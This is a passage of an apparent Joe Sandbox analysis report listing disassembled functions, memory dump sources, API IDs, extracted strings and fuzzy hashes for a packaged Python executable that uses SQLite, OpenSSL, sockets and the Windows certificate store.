2949->2958 2950->2926 2959 7ff72c66bc63-7ff72c66bc6f 2950->2959 2951->2949 2952->2923 2956 7ff72c66be48-7ff72c66be5e call 7ff72c664f08 call 7ff72c664ee8 2953->2956 2957 7ff72c66be63-7ff72c66be66 2953->2957 2954->2953 2961 7ff72c66bd57 2954->2961 2964 7ff72c66bcf3 GetLastError 2955->2964 2965 7ff72c66bd12-7ff72c66bd1c 2955->2965 2956->2949 2969 7ff72c66be6c-7ff72c66be6e 2957->2969 2970 7ff72c66bcf9-7ff72c66bcfb call 7ff72c664e7c 2957->2970 2958->2911 2959->2926 2968 7ff72c66bc71-7ff72c66bc73 2959->2968 2972 7ff72c66bd5e-7ff72c66bd73 2961->2972 2964->2970 2965->2972 2968->2926 2976 7ff72c66bc75-7ff72c66bc85 2968->2976 2969->2958 2970->2949 2972->2958 2978 7ff72c66bd75-7ff72c66bd80 2972->2978 2976->2926 2979 7ff72c66bda7-7ff72c66bdaf 2978->2979 2980 7ff72c66bd82-7ff72c66bd9b call 7ff72c66b674 2978->2980 2984 7ff72c66be2b-7ff72c66be38 call 7ff72c66b4b4 2979->2984 2985 7ff72c66bdb1-7ff72c66bdc3 2979->2985 2988 7ff72c66bda0-7ff72c66bda2 2980->2988 2984->2988 2989 7ff72c66be1e-7ff72c66be26 2985->2989 2990 7ff72c66bdc5 2985->2990 2988->2958 2989->2958 2992 7ff72c66bdca-7ff72c66bdd1 2990->2992 2993 7ff72c66be0d-7ff72c66be18 2992->2993 2994 7ff72c66bdd3-7ff72c66bdd7 2992->2994 2993->2989 2995 7ff72c66bdd9-7ff72c66bde0 2994->2995 2996 7ff72c66bdf3 2994->2996 2995->2996 2997 7ff72c66bde2-7ff72c66bde6 2995->2997 2998 7ff72c66bdf9-7ff72c66be09 2996->2998 2997->2996 2999 7ff72c66bde8-7ff72c66bdf1 2997->2999 2998->2992 3000 7ff72c66be0b 2998->3000 2999->2998 3000->2989
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                  • Instruction ID: 1fb64c4265ef5c98442378a9dd6faad2a8efac5e9508605bdbec03dfb8d90cd3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDC1162290C687D1E762AB1198402BDBBB2FBE1BA0FE54138DA4D07791CF7CE4459F60
                                                                                                                                                                                                                                  Function 00007FF72C656360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                  • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                  • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                  • Instruction ID: 796ce303beb9b4be6c1e9479fbbaca77649ece06acdcfdde21d698eb5fda0e84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7417421B18A8691EA12FB10EC152E9A313FF643A4FE04132EB5D47695DF3CE519CB60
                                                                                                                                                                                                                                  Function 00007FFBAA496FF4 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: setsockopt
                                                                                                                                                                                                                                  • String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
                                                                                                                                                                                                                                  • API String ID: 3981526788-1608436615
                                                                                                                                                                                                                                  • Opcode ID: 32ca9612667a1d97849a044e9fa1363f5e862fb873e08f953f5db1e1b9d64d2d
                                                                                                                                                                                                                                  • Instruction ID: 84c31f9223df03e84e56cdbc0124ca818cf57f0d5108d79f6a196e107dbdb7a0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32ca9612667a1d97849a044e9fa1363f5e862fb873e08f953f5db1e1b9d64d2d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6411DB2609A46D2EB218F31E4C06AE7368FB88B94F500172EE9D43764DF3DD55AC750
                                                                                                                                                                                                                                  Function 00007FFBA679FFD0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                  • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                  • Opcode ID: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                  • Instruction ID: 12f2793f87a0cfabd5006127b9dd515ea5c3dd244955dbdb141ed273a02c9acd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6502C4E1A1F6428AFB568F31E86077963A6FF94F48F044636DE5D426A0DF3DE4888740
                                                                                                                                                                                                                                  Function 00007FFBA679D9E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B593010$FileRead
                                                                                                                                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                  • API String ID: 1571206903-1843600136
                                                                                                                                                                                                                                  • Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                  • Instruction ID: 1d01b8f67ccd37a097044393495b2ed6de5dd601b9b3627b9a936c03cdde6447
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6141E2E2A19A4682E761CF35E8405AD7BABFB94F80F144136EE4D43694EF3CE8568340
                                                                                                                                                                                                                                  Function 00007FFBAA4947A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$connect
                                                                                                                                                                                                                                  • String ID: 3'
                                                                                                                                                                                                                                  • API String ID: 375857812-280543908
                                                                                                                                                                                                                                  • Opcode ID: ad6926efe17413235fb0923d8b5cdfad53428c2f0b392e70a2f0e2a8c3016219
                                                                                                                                                                                                                                  • Instruction ID: 78cb274ad06b232cb0ed1f23280dc2caef548b44c7b86e96941fc4c1875cc28c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad6926efe17413235fb0923d8b5cdfad53428c2f0b392e70a2f0e2a8c3016219
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94317CA5A0AB82C6F7A28F72E4C026D2398AF44B94F100575FD5D827A5DF3CE4628661
                                                                                                                                                                                                                                  Function 00007FFBA66AA874 Relevance: 7.7, APIs: 5, Instructions: 200encryptionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cert$Store$00007CertificateCertificatesCloseContextEnumErrorFreeLastOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2716309604-0
                                                                                                                                                                                                                                  • Opcode ID: 7eb488ba5e32441d0f01a54a1631f0afa1a8ca53c20eef8b2eeae5f161c725b6
                                                                                                                                                                                                                                  • Instruction ID: e8a127af4e32da94c1fa78cf7da376ec34605413058409049ec15966291698da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eb488ba5e32441d0f01a54a1631f0afa1a8ca53c20eef8b2eeae5f161c725b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE8179F5E0B64286EA175F39DE141B922F3FF64F94F08A432CE0E86681DE3DA4459B00
                                                                                                                                                                                                                                  Function 00007FFBA66ACCDC Relevance: 7.6, APIs: 5, Instructions: 64encryptionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CertStore$CloseOpen$Collection
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1995843185-0
                                                                                                                                                                                                                                  • Opcode ID: aaba8413391d0e4b0f15a030ceca06c547fe89b67491544b9257196f0b72f74b
                                                                                                                                                                                                                                  • Instruction ID: 768d10afa35549319cd6d5eb729286fc44c8f41dc604b7f9eba8f05243933287
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaba8413391d0e4b0f15a030ceca06c547fe89b67491544b9257196f0b72f74b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6221F2B2B09A5186FB21DF7AEC146A96762FBA4F84F449430CD0D87B14EF3CE516DA00
                                                                                                                                                                                                                                  Function 00007FF72C665628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                                                                  • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                  • Instruction ID: c6b58e72bd74b63d40caca36ecf0d3e284f8668a89b904be69434ffa4d3f7fcd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C341A462D1878283E711AB209911379B671FBA4774F609339E79C43AD5DF7CA0E08B50
                                                                                                                                                                                                                                  Function 00007FFBA60914BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                  • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                  • Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                  • Instruction ID: 2d0575a2c7a65f1135468b4142f2831b0b82bf9c4a4194dda9a2f618e5881feb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBA15CE2E0E69281FB73AA35D4813BD2697EF51F44F244435DD0D466DACE3CE8E28242
                                                                                                                                                                                                                                  Function 00007FFBA609127B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                  • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                  • Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                  • Instruction ID: d49346efd7d14cb61ac85dd7e9a2c148c486bb70a868fffedf26dfb544779723
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C417DE1B0AA4182FB669B39D58477A3792EB44F94F144235DE0C47BD5DF3DE8A18300
                                                                                                                                                                                                                                  Function 00007FF72C65CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                                                                                  • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                  • Instruction ID: 6e30d9ec16d69f3e57071b0ca5c78008316a9556d923d944832d7baf699061e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66313B20E0894351FA16BB659D223B9A693FFB53E4FE45538DB0D472D7DE2CA404CA30
                                                                                                                                                                                                                                  Function 00007FFBA66AC2AC Relevance: 4.6, APIs: 3, Instructions: 86encryptionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
